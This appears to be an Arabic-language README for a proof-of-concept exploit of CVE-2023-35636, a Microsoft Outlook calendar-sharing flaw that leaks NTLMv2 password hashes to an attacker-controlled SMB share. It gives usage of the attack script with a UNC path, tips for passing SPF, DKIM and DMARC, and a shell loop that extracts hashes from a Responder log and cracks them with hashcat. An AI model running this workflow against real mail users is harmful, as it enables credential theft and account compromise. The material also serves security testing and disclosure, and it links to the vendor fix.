
ثغرة الكشف عن المعلومات في Microsoft Outlook (تسريب هاش كلمة المرور) - Expect Script POC
ثغرة إفصاح معلومات في Microsoft Outlook (تسريب تجزئة كلمة المرور) - برنامج Expect النصي لإثبات المفهوم
CVE-2023-35636 هو استغلال لوظيفة مشاركة التقويم في Microsoft Outlook، حيث تؤدي إضافة ترويسين إلى بريد إلكتروني إلى توجيه Outlook لمشاركة المحتوى والتواصل مع جهاز مخصص، مما يخلق فرصة لاعتراض تجزئة NTLM v2.

usage: ./cve-2023-35636.sh mx.fqdn port email_sender email_recipient smb_share
./cve-2023-35636.sh mail.mydomain.com 25 [email protected] [email protected] \\\\x.x.x.x\\mycalendar.ics (dont forget all the \)

ملاحظات: chmod +x cve-2023-35636.sh
يتطلب تطبيق Expect
يتطلب عنوان IP مرسل شرعي وبريدًا إلكترونيًا مرسلًا شرعيًا (لاجتياز SPF وDKIM وDMARC)


for user in strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'
do
echo "[*] search for: $user";
strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -i $user | cut -d ":" -f 4-10 | head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt
done
hashcat -a 0 -m 5600 ntlm-hashes.txt rockyou.txt -o cracked.txt -O
يعود الفضل إلى: https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes
حل بديل/إصلاح: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35636
لمزيد عني ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ إخلاء مسؤولية: مهم: هذا البرنامج النصي مُقدَّم لأغراض تعليمية واختبار أخلاقي والاستخدام القانوني فقط. لا تستخدمه على أي نظام أو شبكة دون إذن صريح. الوصول غير المصرح به إلى أنظمة الكمبيوتر والشبكات غير قانوني، ويتعرض المستخدمون الذين يُضبطون وهم يقومون بأنشطة غير مصرح بها لإجراءات قانونية. المؤلف غير مسؤول عن أي ضرر ناتج عن إساءة استخدام هذا البرنامج النصي.